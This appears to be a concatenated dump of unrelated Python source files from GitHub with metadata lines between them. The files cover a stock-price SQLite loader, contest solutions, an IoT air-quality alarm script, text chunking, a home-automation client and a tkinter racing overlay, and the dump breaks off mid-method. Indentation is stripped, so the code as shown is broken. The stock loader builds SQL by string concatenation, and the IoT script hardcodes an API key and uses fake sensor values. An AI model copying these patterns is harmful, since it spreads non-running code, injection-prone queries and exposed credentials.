5分钟线读取也是一样。
"""
import os
import sys
import struct
import datetime
import numpy as np
import pandas as pd
import winreg
import sqlite3
def createDataBase():
cn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
'''
GPDM股票代码
RQ交易日期
OPEN开盘价
HIGH最高价
LOW最低价
CLOSE收盘价
AMOUT成交额(亿元)
VOLUME成交量(万股)
RATE涨跌幅
PRE_CLOSE前收盘价
ADJ_RATE前复权调整涨跌幅
ADJ_CLOS前复权E调整收盘价
GPDM与RQ构成为唯一索引
'''
cn.execute('''CREATE TABLE IF NOT EXISTS GJ
(GPDM TEXT NOT NULL,
RQ TEXT NOT NULL,
OPEN REAL NOT NULL DEFAULT (0.00),
HIGH REAL NOT NULL DEFAULT (0.00),
LOW REAL NOT NULL DEFAULT (0.00),
CLOSE REAL NOT NULL DEFAULT (0.00),
AMOUT REAL NOT NULL DEFAULT (0.00),
VOLUME REAL NOT NULL DEFAULT (0.00),
RATE REAL NOT NULL DEFAULT (0.00),
PRE_CLOSE REAL NOT NULL DEFAULT (0.00),
ADJ_RATE REAL NOT NULL DEFAULT (0.00),
ADJ_CLOSE REAL NOT NULL DEFAULT (0.00));''')
cn.execute('''CREATE UNIQUE INDEX IF NOT EXISTS GPDM_RQ_GJ ON GJ(GPDM,RQ);''')
##########################################################################
#将字符串转换为时间戳,不成功返回None
##########################################################################
def str2datetime(s):
try:
dt = datetime.datetime(int(s[:4]),int(s[4:6]),int(s[6:8]))
except :
dt = None
return dt
###############################################################################
#将通达信.day读入pands
###############################################################################
def day2pd(dayfn,start=None,end=None):
columns = ['rq','date','open', 'high', 'low','close','amout','volume','rate','pre_close','adj_rate','adj_close']
with open(dayfn,"rb") as f:
data = f.read()
f.close()
days = int(len(data)/32)
records = []
qsp = 0
for i in range(days):
dat = data[i*32:(i+1)*32]
rq,kp,zg,zd,sp,cje,cjl,tmp = struct.unpack("iiiiifii", dat)
rq1 = str2datetime(str(rq))
rq2 = rq1.strftime("%Y-%m-%d")
kp = kp/100.00
zg = zg/100.00
zd = zd/100.00
sp = sp/100.00
cje = cje/100000000.00 #亿元
cjl = cjl/10000.00 #万股
zf = sp/qsp-1 if (i>0 and qsp>0) else 0.0
records.append([rq1,rq2,kp,zg,zd,sp,cje,cjl,zf,qsp,zf,sp])
qsp = sp
df = pd.DataFrame(records,columns=columns)
df = df.set_index('rq')
start = str2datetime(start)
end = str2datetime(end)
if start == None or end==None :
return df
else :
return df[start:end]
########################################################################
#获取本机通达信安装目录,生成自定义板块保存目录
########################################################################
def gettdxdir():
try :
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\华西证券华彩人生")
value, type = winreg.QueryValueEx(key, "InstallLocation")
except :
print("本机未安装【华西证券华彩人生】软件系统。")
sys.exit()
return value
###############################################################################
#将通达信.day读入pands
###############################################################################
def tdxday2pd(gpdm,start=None,end=None):
gpdm=sgpdm(gpdm)
sc = 'sh' if gpdm[0]=='6' else 'sz'
# dayfn =getdisk()+'\\tdx\\'+sc+'lday\\'+sc+gpdm+'.day'
dayfn =gettdxdir()+'\\vipdoc\\'+sc+'\\lday\\'+sc+gpdm+'.day'
if os.path.exists(dayfn) :
return day2pd(dayfn,start,end)
else :
return []
###############################################################################
#将分红数据读入pands
###############################################################################
def fhsql2pd(gpdm):
gpdm=lgpdm(gpdm)
conn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
sql="select rq as gqdjr,fh,szg from fh where gpdm=='" +gpdm+"';"
df=pd.read_sql_query(sql, con=conn)
conn.close()
df['gqdjr']=df['gqdjr'].map(lambda x:x.replace('-',''))
df['date']=df['gqdjr'].map(str2datetime)
return df.set_index('date')
###############################################################################
#将配股数据读入pands
###############################################################################
def pgsql2pd(gpdm):
gpdm=lgpdm(gpdm)
conn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
sql="select rq as gqdjr,pgj,pgbl from pg where gpdm=='" +gpdm+"';"
df=pd.read_sql_query(sql, con=conn)
conn.close()
df['gqdjr']=df['gqdjr'].map(lambda x:x.replace('-',''))
df['date']=df['gqdjr'].map(str2datetime)
return df.set_index('date')
###############################################################################
#合并分红配股数据,并按股权登记日降序排列
###############################################################################
def getfhpg(gpdm):
gpdm=lgpdm(gpdm)
fh=fhsql2pd(gpdm)
pg=pgsql2pd(gpdm)
fhpg=pd.merge(fh,pg,how='outer',on='gqdjr')
fhpg=fhpg.sort_values(by='gqdjr', ascending=False)
return fhpg.fillna(0)
###############################################################################
#长股票代码
###############################################################################
def lgpdm(dm):
return dm[:6]+('.SH' if dm[0]=='6' else '.SZ')
###############################################################################
#短股票代码
###############################################################################
def sgpdm(dm):
return dm[:6]
################################################################################
#提取DataFrame时间索引,返回日期
################################################################################
def df_timeindex_to_datelist(df):
dfti = df.index
dftia = np.vectorize(lambda s: s.strftime('%Y%m%d'))(dfti.to_pydatetime())
return dftia.tolist()
###############################################################################
#分红日期为股权登记日前复权收盘价
###############################################################################
def adj_close(df,fhpg):
for i in range(len(fhpg)):
date, fh, szg, pgj, pgbl = fhpg.iloc[i]
# date=nextdtstr(date,-1) #如果是除权除息日则将除权基准日推前一天变为股权登记日
fqyes = False #如果股权登记日不在数据范围内则不能进行复权处理
if len(df.loc[date:date])==1 : #股权登记日存在交易
fqyes = True
else :
date = df_next_date(df,date,-1) #股权登记日不存在交易则前找交易日
if len(df.loc[date:date])==1 : #股权登记日前有交易则进行复权
fqyes = True
if fqyes :
oldclose = df.loc[date,'adj_close']
newclose = (oldclose - fh + pgj*pgbl)/(1+szg+pgbl)
newclose = round(newclose,2) #四舍五入,保留2位小数
df.loc[date,'adj_close'] = newclose
nextdate = df_next_date(df,date,1)
if nextdate == None :
break
df.loc[nextdate,'pre_close'] = newclose
df.loc[nextdate,'adj_rate'] = df.loc[nextdate,'close']/df.loc[nextdate,'pre_close']- 1
ti = df_timeindex_to_datelist(df)
ti.reverse()
for i in range(len(ti)):
date = ti[i]
if i== 0 :
df.loc[date,'adj_close'] = df.loc[date,'adj_close']
else :
df.loc[date,'adj_close'] = next_close /(1+next_rate)
next_close = df.loc[date,'adj_close']
next_rate = df.loc[date,'adj_rate']
return df
################################################################################
#提取DataFrame时间索引指定日期date前n个日期,返回日期
################################################################################
def df_next_date(df,date,n=0):
dftilst = df_timeindex_to_datelist(df)
dftilst.sort()
tmin = str2datetime(dftilst[0])
tmax = str2datetime(dftilst[len(dftilst)-1])
t = str2datetime(date)
if t< tmin or t>tmax :
return None
try :
i = dftilst.index(date)
if i+n<0 or i+n>=len(dftilst) :
return None
else :
return dftilst[dftilst.index(date)+n]
except :
while True :
date = nextdtstr(date,-1)
if date in dftilst :
return date
##########################################################################
#n天后日期串,不成功返回None
##########################################################################
def nextdtstr(s,n):
dt = str2datetime(s)
if dt :
dt += datetime.timedelta(n)
return dt.strftime("%Y%m%d")
else :
return None
###############################################################################
# 复权股价存入Sqlite3
###############################################################################
def qgjfq(gpdm):
dbcn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
gj=tdxday2pd(gpdm)
fhpg = getfhpg(gpdm)
if len(fhpg)>0 :
fqgj=adj_close(gj,fhpg)
fqgj['gpdm']=lgpdm(gpdm)
fqgj=fqgj.loc[:,['gpdm','date','open','high','low','close','amout','volume',
'rate','pre_close','adj_rate','adj_close']]
data=np.array(fqgj).tolist()
dbcn.executemany('''INSERT OR REPLACE INTO GJ (GPDM,RQ,OPEN,HIGH,LOW,CLOSE,
AMOUT,VOLUME,RATE,PRE_CLOSE,ADJ_RATE,ADJ_CLOSE)
VALUES (?,?,?,?,?,?,?,?,?,?,?,?)''', data)
dbcn.commit()
dbcn.close()
if __name__ == '__main__':
createDataBase()
dm='002673'
| RoveAllOverTheWorld512/hyb_bak | fhpgsql2pd.py | fhpgsql2pd.py | py | 11,493 | python | de | code | 0 | github-code | 90 |
18047575669 | # -*- coding: utf-8 -*-
"""
Created on Sun May 10 17:43:29 2020
@author: shinba
"""
n = int(input())
s = input()
t = input()
l = 0
for i in range(n):
if s[i:] == t[:n-i]:
l = n-i
break
print(2*n-l)
| Aasthaengg/IBMdataset | Python_codes/p03951/s501331802.py | s501331802.py | py | 230 | python | en | code | 0 | github-code | 90 |
18669325977 | from json import *
from time import *
from gpio import *
from realhttp import *
from tcp import *
from udp import *
# Vars and Globals
should_alert = False
message = ''
alarm_status = ''
data_carbon = 0
data_aqi = 0
PIN_LCD = 0
THRESH = 1670 # THRESH is the Threshold, New Zealand has the Ambiant set to 10 milligrams per cubic
TENMIN = 600
# Networking
IPV4_DEST_IP = '192.168.0.18'
PORT = 5000
# API URL Stuff
lat = -43.5379285
lon = 172.6416436
appid = 'b6f2ab6d117dde167c890593abb7ef56'
API_URL = "http://api.openweathermap.org/data/2.5/air_pollution?lat={}&lon={}&appid={}".format(lat,lon,appid)
# CODE
def startup():
global alarm_status
alarm_status = ''
def writeLCD(msg):
customWrite(PIN_LCD, msg)
def onHTTPDone(status, data):
global data_carbon
global data_aqi
global should_alert
global alarm_status
"""
Currently getting invalid Key - using temp nums instead
"""
j_data = loads(data)
# print(data)
# aqi = j_data['list'][0]['main']['aqi']
# c_data = j_data['list'][0]['components']['co']
c_data = 2000
aqi = 1
data_carbon = c_data
data_aqi = aqi
if c_data >= THRESH:
should_alert = True
alarm_status = 'ALARM'
else:
should_alert = False
alarm_status = 'Normal'
def send_instruction(instruction):
client = TCPClient()
client.connect(IPV4_DEST_IP, PORT)
delay(50)
client.send(instruction)
delay(50)
client.close()
def main():
global message
global alarm_status
startup()
http = RealHTTPClient()
http.onDone(onHTTPDone)
while True:
http.get(API_URL)
print(data_aqi, data_carbon)
if should_alert == True:
writeLCD("AQI: " + str(data_aqi) + '\n' + "Status: " + alarm_status)
message = 'StartAlarm'
send_instruction(message)
else:
writeLCD("AQI: " + str(data_aqi) + '\n' + "Status: " + alarm_status)
message = 'StopAlarm'
send_instruction(message)
# sleep(TENMIN)
sleep(5) # This is for testing
if __name__ == '__main__':
main() | Birphon/BCCS183-Internet-of-Things | Lab 9-1-1/SBC1 - LCD.py | SBC1 - LCD.py | py | 2,137 | python | en | code | 0 | github-code | 90 |
18263114609 | N, M, K = map(int, input().split())
friend = {}
for i in range(M):
A, B = map(lambda x: x-1, map(int, input().split()))
if A not in friend:
friend[A] = []
if B not in friend:
friend[B] = []
friend[A].append(B)
friend[B].append(A)
block = {}
for i in range(K):
C, D = map(lambda x: x-1, map(int, input().split()))
if C not in block:
block[C] = []
if D not in block:
block[D] = []
block[C].append(D)
block[D].append(C)
first = {}
for i in range(N):
if i not in first:
first[i] = i
if i in friend:
queue = []
queue.extend(friend[i])
counter = 0
while counter < len(queue):
item = queue[counter]
first[item] = i
if item in friend:
for n in friend[item]:
if n not in first:
queue.append(n)
counter += 1
size = {}
for key in first:
if first[key] not in size:
size[first[key]] = 1
else:
size[first[key]] += 1
for i in range(N):
if i not in friend:
print(0)
continue
no_friend = 0
if i in block:
for b in block[i]:
if first[b] == first[i]:
no_friend += 1
print(size[first[i]] - len(friend[i]) - no_friend - 1) | Aasthaengg/IBMdataset | Python_codes/p02762/s462418193.py | s462418193.py | py | 1,373 | python | en | code | 0 | github-code | 90 |
10334624596 | import os
from glob import glob
from tqdm import tqdm
import pandas as pd
from syntok.tokenizer import Tokenizer
def chunks(tokens, chunksize):
"""Split a list into chunks of ``chunksize`` tokens each."""
for n in range(0, len(tokens), chunksize):
yield tokens[n:n + chunksize]
def main(chunksize=1000):
md = pd.read_csv('metadata-pg-genres-subset.tsv', sep='\t')
ids = set(md['id'])
with open('sw_jockers.txt') as inp:
stopwords = set(inp.read().splitlines())
stopwords.update('.,?!:;-_&%$*#+=()[]/"\'')
stopwords.update({'--', '---', '...',
"'s", "'t", "'m", "n't", "'ve", "'ll", "n't", "'re", "'d"})
tok = Tokenizer(replace_not_contraction=False)
with open('chunkedcorpus.txt', 'w', encoding='utf8') as out:
with open('gutenberg-clean.ol', encoding='utf8') as inp:
for line in tqdm(inp):
name, text = line.split('\t', 1)
if name not in ids:
continue
text = text.lower().replace('--', ' -- ')
tokens = [token.value for token in tok.tokenize(text)
if token.value not in stopwords
and not token.value.isnumeric()]
for n, chunk in enumerate(chunks(tokens, chunksize)):
out.write('%s_%d\t%s_%d\t%s\n' % (
name, n, name, n, ' '.join(chunk)))
if __name__ == '__main__':
main()
| andreasvc/fictiongenres | topicmodelpreprocess.py | topicmodelpreprocess.py | py | 1,250 | python | en | code | 0 | github-code | 90 |
4423562108 | #
# web_server_status.py
#
# Implements interfacing with the KotakeeOS central home automation
# web server. A single static class should be utilized for all
# speech_server interactions.
import threading
import requests
import json
import datetime
class WebServerStatus:
web_server_ip_address = None
action_states = None
home_status = None
action_states_last_update = 0
home_status_last_update = 0
# Tells other components if we believe we are connected to the
# internet and/or local web server and/or cloud inference
# server.
online_status = False
web_server_status = False
cloud_inference_status = False
def __init__(self, ip_address, cloud_inference_address, use_cloud_inference):
self.web_server_ip_address = ip_address
self.cloud_inference_address = cloud_inference_address
self.use_cloud_inference = use_cloud_inference
# Request server statuses right on startup.
self.execute_query_server_thread()
def execute_query_server_thread(self):
"""
Non-blocking query to fill status objects as well as to
check connectivity with home infrastructure + internet.
"""
query_action_states_thread = threading.Thread(target=self.query_action_states, daemon=True).start()
query_home_status_thread = threading.Thread(target=self.query_home_status, daemon=True).start()
test_wide_internet_thread = threading.Thread(target=self.test_wide_internet, daemon=True).start()
# If we have disabled cloud inference, just never query for it's
# status. We'll act like we're not connected.
if self.use_cloud_inference:
test_cloud_inference_thread = threading.Thread(target=self.test_cloud_inference_server, daemon=True).start()
# Queries server for states of all modules.
def query_action_states(self):
query = self.web_server_ip_address + "/actionStates/" + str(self.action_states_last_update)
print("[DEBUG] Querying server: " + query)
try:
response = requests.get(query)
if(response.status_code == 200):
self.action_states = json.loads(response.text)
self.action_states_last_update = self.action_states['lastUpdate']
print("[DEBUG] Action States request received successfully. action_states_last_update is now: " + str(self.action_states_last_update))
#print(str(action_states))
elif(response.status_code != 204):
print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
self.web_server_status = True
except:
print("[WARNING] query_action_states unable to connect to server.")
self.web_server_status = False
# Queries server for misc non-module information
def query_home_status(self):
query = self.web_server_ip_address + "/homeStatus/" + str(self.home_status_last_update)
print("[DEBUG] Querying server: " + query)
try:
response = requests.get(query)
if(response.status_code == 200):
self.home_status = json.loads(response.text)
self.home_status_last_update = self.home_status['lastUpdate']
print("[DEBUG] Home Status request received successfully. home_status_last_update is now: " + str(self.home_status_last_update))
#print(str(home_status))
elif(response.status_code != 204):
print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
self.web_server_status = True
except:
print("[WARNING] query_home_status unable to connect to server.")
self.web_server_status = False
# Function to check true wide internet connectivity.
def test_wide_internet(self):
connection_status = False
try:
requests.head('http://www.google.com/', timeout=10)
connection_status = True
except:
pass
self.online_status = connection_status
return connection_status
def test_cloud_inference_server(self):
connection_status = False
try:
requests.head(self.cloud_inference_address, timeout=10)
connection_status = True
except:
pass
self.cloud_inference_status = connection_status
return connection_status
# Returns time of sunset and sunrise, but only if we're connected
# to the web server (which is our source for openweathermap API
# information).
#
# Converts from float time (since the beginning of time) to a more
# tractable hours/minutes format.
def get_sunrise_sunset_time(self):
if self.web_server_status is True:
sunrise_hours = None
sunrise_minutes = None
sunset_hours = None
sunset_minutes = None
try:
if self.home_status is not None:
sunset_time = float(self.home_status["weatherData"]["sys"]["sunset"])
sunrise_time = float(self.home_status["weatherData"]["sys"]["sunrise"])
# Convert into seconds starting from 12:00am today.
sunset_datetime = datetime.datetime.fromtimestamp(sunset_time)
sunrise_datetime = datetime.datetime.fromtimestamp(sunrise_time)
sunset_hours = int(sunset_datetime.strftime("%H"))
sunset_minutes = int(sunset_datetime.strftime("%M"))
sunrise_hours = int(sunrise_datetime.strftime("%H"))
sunrise_minutes = int(sunrise_datetime.strftime("%M"))
print("[DEBUG] Web Server Status Sunset: " + str(sunset_hours) + ":" + str(sunset_minutes) + " Sunrise: " + str(sunrise_hours) + ":" + str(sunrise_minutes) + ".")
return sunrise_hours, sunrise_minutes, sunset_hours, sunset_minutes
except Exception as e:
print("[ERROR] Web Server Status was unable to correctly parse sunset/sunrise time! Exception:")
print(e)
return None, None, None, None
# Creates a thread that queries server to turn speech server signal
# light on/off.
def query_speech_server_module_toggle(self, toState, roomId, actionId):
query = self.web_server_ip_address + "/moduleToggle/"+str(roomId)+"/"+str(actionId)+"/" + str(toState)
request_thread = threading.Thread(target=self.execute_get_query, args=(query,), daemon=True).start()
# Creates a thread that queries server providing input.
def query_speech_server_input(self, toState, roomId, actionId):
query = self.web_server_ip_address + "/moduleInput/"+str(roomId)+"/"+str(actionId)+"/" + str(toState)
request_thread = threading.Thread(target=self.execute_get_query, args=(query,), daemon=True).start()
# Formats, and creates a thread to query the server with a simple
# POST query.
def query_speech_server_module_input_modify(self, data_to_send):
query = self.web_server_ip_address + "/moduleInputModify"
request_thread = threading.Thread(target=self.execute_post_query, args=(query,data_to_send), daemon=True).start()
def query_speech_server_piano_play(self, data_to_send):
query = self.web_server_ip_address + "/pianoPlayMidi"
request_thread = threading.Thread(target=self.execute_post_query, args=(query,data_to_send), daemon=True).start()
def query_speech_server_piano_stop(self):
query = self.web_server_ip_address + "/pianoStopMidi"
request_thread = threading.Thread(target=self.execute_get_query, args=(query,), daemon=True).start()
# Returns True if pianoStatus is true (currently playing.)
def query_speech_server_piano_status(self):
query = self.web_server_ip_address + "/pianoStatus"
print("[DEBUG] Querying server: " + query)
try:
response = requests.get(query)
if(response.status_code == 200):
return True
elif(response.status_code != 204):
print("[WARNING] Server rejected /pianoStatus request with status code " + str(response.status_code) + ".")
return False
except:
print("[WARNING] query_speech_server_piano_status unable to connect to server.")
return False
# Executes a simple GET query and expects the status code to be 200.
def execute_get_query(self, query):
print("[DEBUG] Executing GET query: " + query + "\n")
try:
response = requests.get(query)
if(response.status_code == 200):
print("[DEBUG] Request received successfully.")
else:
print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
self.web_server_status = True
except Exception as e:
print("[WARNING] execute_get_query unable to connect to server. Exception:")
print(e)
self.web_server_status = False
# Executes a simple POST query and expects the status code to be 200.
def execute_post_query(self, query, data_to_send, timeout=5, verbose = True):
if verbose:
print("[DEBUG] Executing POST query: " + query + " with body:")
print(data_to_send)
try:
response = requests.post(query, data=json.dumps(data_to_send, indent = 4), headers = {'Content-Type': 'application/json'}, timeout=timeout)
if(response.status_code == 200):
if verbose: print("[DEBUG] Request received successfully.")
else:
print("[WARNING] Server rejected request with status code " + str(response.status_code) + ".")
self.web_server_status = True
return response
except Exception as e:
print("[WARNING] execute_post_query unable to connect to server. Exception:")
print(e)
self.web_server_status = False
return None
# Given the possible command string, roomId, actionId, and
# a binary set of states, return a query.
#
# If the command contains the keyword "virtual", a virtual
# module toggle will be created instead of physical.
def generate_query(self, command, roomId, actionId, onState, offState):
endpoint = "/moduleToggle/"
if "virtual" in command:
endpoint = "/moduleVirtualToggle/"
if("off" in command or "deactivate" in command):
return self.web_server_ip_address + endpoint +str(roomId)+"/"+str(actionId)+"/" + str(offState)
elif("on" in command or "activate" in command or "initialize" in command):
return self.web_server_ip_address + endpoint +str(roomId)+"/"+str(actionId)+"/" + str(onState)
else:
# No on or off specified. Check queried information.
if(self.action_states is not None):
if(self.action_states[str(roomId)][str(actionId)] == int(onState)):
return self.web_server_ip_address + endpoint +str(roomId)+"/"+str(actionId)+"/" + str(offState)
else:
return self.web_server_ip_address + endpoint+str(roomId)+"/"+str(actionId)+"/" + str(onState)
| ArthurlotLi/kotakee_companion | speech_server/web_server_status.py | web_server_status.py | py | 10,449 | python | en | code | 2 | github-code | 90 |
6046834609 | """
ファイルやフォルダの操作を行う関数群.
"""
import os
import glob
import pathlib
import platform
import datetime
def makedirs_plus(dir_path, permission=0o2777):
'''
dirの存在を確認して、なかったら作成
:param dir_path:作成したいdirパス
:param permission:与えたいパーミッション、デフォは全開放
:return:なし
'''
if not os.path.exists(dir_path):
os.makedirs(dir_path)
os.chmod(dir_path, permission)
pass
def creation_date(filepath):
"""
現在実行中のOSに関わらず、ファイルの作成日時を返す
(Mac以外のUNIX系は作成日の取得ができない(os.stat(path_to_file).st_birthtimeが通らない)ので、最終更新日を返す)
:param filepath: 作成日時を取得したいファイルのパス
:return: ファイル作成時間
"""
if platform.system() == 'Windows':
return os.path.getctime(filepath)
else:
stat = os.stat(filepath)
try:
return stat.st_birthtime
except AttributeError:
# Mac以外のUNIX系は作成日の取得ができない(os.stat(path_to_file).st_birthtimeが通らない)ので、最終更新日を返す
return stat.st_mtime
def listdir_sort(target_dir,target_exp='',subfolder=False,sort_by='name'):
"""
指定したディレクトリ内の、指定した拡張子のファイルをソートした文字列リストの状態で返す。
:param target_dir: 対象のディレクトリ
:param target_exp: 対象の拡張子
:param subfolder: サブフォルダ以下の検索を行うか否か
:param sort_by: ソートする基準
:return:ソート済みのファイルパス文字列のリスト
"""
if subfolder:
target_path_list = list(pathlib.Path(target_dir).glob('**/*' + target_exp))
else:
target_path_list = list(pathlib.Path(target_dir).glob('*' + target_exp))
target_path_list = [str(target_path) for target_path in target_path_list]
if sort_by=='name':
target_path_list.sort()
elif sort_by=='create_date':
create_date_path_list = [[datetime.datetime.fromtimestamp(creation_date(target_path)), target_path] for target_path in target_path_list]
create_date_path_list.sort(reverse=True)
target_path_list = [create_date_path[1] for create_date_path in create_date_path_list]
return target_path_list
| sikakusosi/kutinawa | kutinawa/kutinawa_fileOP.py | kutinawa_fileOP.py | py | 2,575 | python | ja | code | 1 | github-code | 90 |
20465691989 | import sys
input = sys.stdin.readline
n, m = map(int, input().split())
arr = []
def recur(num, count):
if count == m: # 기저 조건
print(*arr)
return
for i in range(num, n+1):
arr.append(i)
recur(i, count+1)
arr.pop()
recur(1, 0) | undervi/coding_test_python | 백준/Silver/15652. N과 M (4)/N과 M (4).py | N과 M (4).py | py | 309 | python | en | code | 1 | github-code | 90 |
15423176697 | import threading
import time
from tkinter import Tk, Label, StringVar, Frame, Button, Toplevel, Scale, messagebox
import logging
# from functools import partial # allows for passing both a function as well as its arguments, in case of "command=partial(func, arg1, arg2)"
from previous_versions.very_old_code.load_config import load_config, save_in_config
from src.frontend.hover_info import HoverInfoWindow
class ChildScreen:
def __init__(self, parent_obj, width=None, height=None):
self.parent_obj = parent_obj
self.master = Toplevel(self.parent_obj.master)
self.width = width
self.height = height
self.set_window_size()
# Load the configuration file
load_config(self)
def set_window_size(self):
"""
Changes the geometry of the master window in case desired dimensions are given
(if not given, the window's size will automatically adjust to contents inside)
"""
if self.width and self.height:
self.master.geometry('%dx%d' % (self.width, self.height))
def open_in_middle(self):
"""
Opens the window in the middle of the screen
:return:
"""
# get screen width and height
ws = self.master.winfo_screenwidth() # width of the screen
hs = self.master.winfo_screenheight() # height of the screen
# calculate x and y coordinates for the Toplevel master window
x = (ws / 2) - (self.width / 2)
y = (hs / 2) - (self.height / 2)
# Add offsets to center the window
self.master.geometry('+%d+%d' % (x, y))
def start_move(self, event):
self.x = event.x
self.y = event.y
def stop_move(self, event):
self.x = None
self.y = None
def do_move(self, event):
deltax = event.x - self.x
deltay = event.y - self.y
x = self.master.winfo_x() + deltax
y = self.master.winfo_y() + deltay
self.master.geometry(f"+{x}+{y}")
def set_drag_bind(self, bl_bind_on):
if bl_bind_on:
self.master.bind("<ButtonPress-1>", self.start_move)
self.master.bind("<ButtonRelease-1>", self.stop_move)
self.master.bind("<B1-Motion>", self.do_move)
else:
self.master.unbind("<ButtonPress-1>")
self.master.unbind("<ButtonRelease-1>")
self.master.unbind("<B1-Motion>")
class MainScreen:
def __init__(self, master: Tk, telemetry, ir_conn, state, width, height):
# Load the configuration file
load_config(self)
# Initialization
self.master = master
self.master.iconbitmap("docs/RacingInsights_Logo.ico")
self.master.title("RacingInsights")
self.master.config(width=width, height=height, bg=self.bg_color)
self.width = width
self.height = height
self.open_in_middle()
self.fuel_open = False
self.settings_open = False
self.telemetry = telemetry
self.ir_conn = ir_conn
self.state = state
self.font = f'{self.font_style} {self.font_size} {self.font_extra}'
self.button1 = Button(self.master, text='Open Fuel Overlay', font=self.font, width=self.button_width, fg=self.fg_color, height=self.button_height, command=self.open_fuel, bg=self.button_color)
self.button1.place(relx=0.5, rely=(1/3),anchor='center')
self.button_settings = Button(self.master, text='Settings', font=self.font, width=self.button_width, height=self.button_height, fg=self.fg_color, bg=self.button_color, command=self.open_settings)
self.button_settings.place(relx=0.5, rely=(2/3), anchor='center')
def open_in_middle(self):
# get screen width and height
ws = self.master.winfo_screenwidth() # width of the screen
hs = self.master.winfo_screenheight() # height of the screen
# calculate x and y coordinates for the Tk root window
x = (ws / 2) - (self.width / 2)
y = (hs / 2) - (self.height / 2)
# set the dimensions of the screen and where it is placed
self.master.geometry('%dx%d+%d+%d' % (self.width, self.height, x, y))
def open_fuel(self):
"""
Creates and opens the fuel window and a separate thread for updating its values periodically
:return:
"""
if self.fuel_open == False:
self.fuel_app = FuelScreen(parent_obj=self, width=None, height=None, telemetry=self.telemetry, ir_conn=self.ir_conn, state=self.state)
self.fuel_open = True
def open_settings(self):
"""
Opens the settings window. This settings window can be used to change the appearance of the overlays.
:return:
"""
if self.settings_open == False:
self.settings_open = True
self.settings_app = SettingsScreen(parent_obj=self, width=1200, height= 600)
class SettingsScreen(ChildScreen):
def __init__(self,parent_obj, width, height):
super().__init__(parent_obj, width, height)
# Initialization
self.master.config(bg=self.bg_color)
self.master.title("Settings")
self.open_in_middle()
self.master.lift()
self.master.protocol("WM_DELETE_WINDOW", self.on_closing)
# Make sure to open the fuel app before opening the UI elements in SettingsScreen linked to the fuel app
self.parent_obj.open_close_fuel()
self.font = f'{self.font_style} {self.font_size} {self.font_extra}'
self.init_visuals()
def on_closing(self):
if messagebox.askyesno(title="Unsaved settings",message= "Would you like to save these current settings?"):
logging.info("The user asked to save the settings in the config file")
self.save_settings_in_config()
else:
logging.info("The user asked not to save the settings, current config is reloaded")
load_config(self.parent_obj.fuel_app)
self.parent_obj.fuel_app.master.geometry(f"+{self.parent_obj.fuel_app.offset_right}+{self.parent_obj.fuel_app.offset_down}")
self.parent_obj.fuel_app.update_visuals()
self.lock_fuel_lock()
logging.info("Settings window closed")
# Set the settings_open boolean of the parent_obj to False to allow for re-opening the settings window again
self.parent_obj.settings_open = False
self.master.destroy()
def save_settings_in_config(self):
fuelscreen_font_size = self.fontsize_slider.get()
fuelscreen_text_padding = self.textpadding_slider.get()
fuelscreen_offset_right = self.parent_obj.fuel_app.master.winfo_x()
fuelscreen_offset_down = self.parent_obj.fuel_app.master.winfo_y()
save_in_config( font_size=["FUELSCREEN",fuelscreen_font_size],
text_padding=["FUELSCREEN",fuelscreen_text_padding],
offset_right=["FUELSCREEN",fuelscreen_offset_right],
offset_down=["FUELSCREEN",fuelscreen_offset_down])
def init_visuals(self):
"""
Initializes the visual elements of the settings window
:return:
"""
settings_block_width = 200
settings_block_height = 100
self.fontsize_frame = Frame(self.master, bg=self.bg_color, width=settings_block_width, height=settings_block_height)
self.fontsize_frame.pack(pady=10)
self.textpadding_frame = Frame(self.master, bg=self.bg_color, width=settings_block_width, height=settings_block_height)
self.textpadding_frame.pack(pady=10)
self.lockbutton_frame = Frame(self.master, bg="RED", width=settings_block_width, height=settings_block_height)
self.lockbutton_frame.pack(pady=10)
self.fontsize_label = Label(self.fontsize_frame, text="Font size", font=self.parent_obj.font, bg=self.bg_color, fg=self.fg_color)
self.fontsize_label.pack(fill='both')
self.fontsize_slider = Scale(self.fontsize_frame, from_=7, to=30, orient='horizontal', command=self.set_font_size)
self.fontsize_slider.set(self.parent_obj.fuel_app.font_size)
self.fontsize_slider.pack()
self.textpadding_label = Label(self.textpadding_frame, text="Text padding", font=self.parent_obj.font, bg=self.bg_color, fg=self.fg_color)
self.textpadding_label.pack(fill='both')
self.textpadding_slider = Scale(self.textpadding_frame, from_=0, to=50, orient='horizontal', command=self.set_text_padding)
self.textpadding_slider.set(self.parent_obj.fuel_app.text_padding)
self.textpadding_slider.pack()
self.lockbutton = Button(self.lockbutton_frame, text='Toggle Fuel Lock', font=self.font, width=self.button_width, height=self.button_height, fg=self.fg_color, bg=self.button_color, command=self.toggle_fuel_lock)
self.lockbutton.pack()
# Add a hover info window to explain the button's functionality
self.lockbutton_hover_info = HoverInfoWindow(master_widget=self.lockbutton,text="lock or unlock the fuel overlay to position it to your liking")
def lock_fuel_lock(self):
if not (self.parent_obj.fuel_app.locked):
self.parent_obj.fuel_app.set_drag_bind(False)
self.parent_obj.fuel_app.locked = True
def toggle_fuel_lock(self):
self.parent_obj.fuel_app.locked = not(self.parent_obj.fuel_app.locked)
if not (self.parent_obj.fuel_app.locked):
self.parent_obj.fuel_app.set_drag_bind(True)
else:
self.parent_obj.fuel_app.set_drag_bind(False)
def set_font_size(self, value):
font_size = int(value)
self.parent_obj.fuel_app.resize_text(font_size=font_size)
def set_text_padding(self, value):
text_padding = int(value)
self.parent_obj.fuel_app.resize_padding(text_padding=text_padding)
class FuelScreen(ChildScreen):
def __init__(self, parent_obj, width, height, telemetry, ir_conn, state):
super().__init__(parent_obj, width, height)
# Initialization
self.master.title("FuelScreen")
self.master.geometry(f"+{self.offset_right}+{self.offset_down}")
self.master.overrideredirect(True)
self.master.lift()
self.master.wm_attributes("-topmost", True)
self.set_styling_vars()
self.locked = True
self.init_visuals()
# Create a thread for updating the dashboard data
thread = threading.Thread(target=self.update_dash, args=[telemetry, ir_conn, state])
# Set this thread to be a daemon, this way the application will close when all non-daemon threads are closed
# (the only non daemonic thread should be the main thread for this functionality)
thread.daemon = True
thread.start()
def set_styling_vars(self):
"""
